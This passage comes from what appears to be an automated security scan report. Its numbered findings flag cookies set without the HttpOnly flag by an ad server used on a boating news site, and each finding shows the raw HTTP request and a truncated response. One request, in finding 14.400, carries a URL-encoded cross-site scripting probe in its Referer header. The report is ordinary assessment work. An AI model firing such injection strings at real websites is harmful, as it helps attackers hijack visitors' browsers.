document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325970382/Middle
...[SNIP]...

14.390. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4326
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/574701930/Middle/
...[SNIP]...

14.391. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4574
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1676958441/Middle
...[SNIP]...

14.392. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4564
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/67159038/Middle/D
...[SNIP]...

14.393. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4513
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/815723633/Middle/
...[SNIP]...

14.394. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4513
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379732218/Middle
...[SNIP]...

14.395. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4620
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1664822342/Middle
...[SNIP]...

14.396. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:00:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4326
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156765544/Middle/
...[SNIP]...

14.397. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1645991668/Middle
...[SNIP]...

14.398. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:54:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4830
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/790701053/Middle/
...[SNIP]...

14.399. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4561
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1039059921/Middle
...[SNIP]...

14.400. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4259
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/979012939/Middle/
...[SNIP]...

14.401. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.402. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.403. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.404. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.405. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
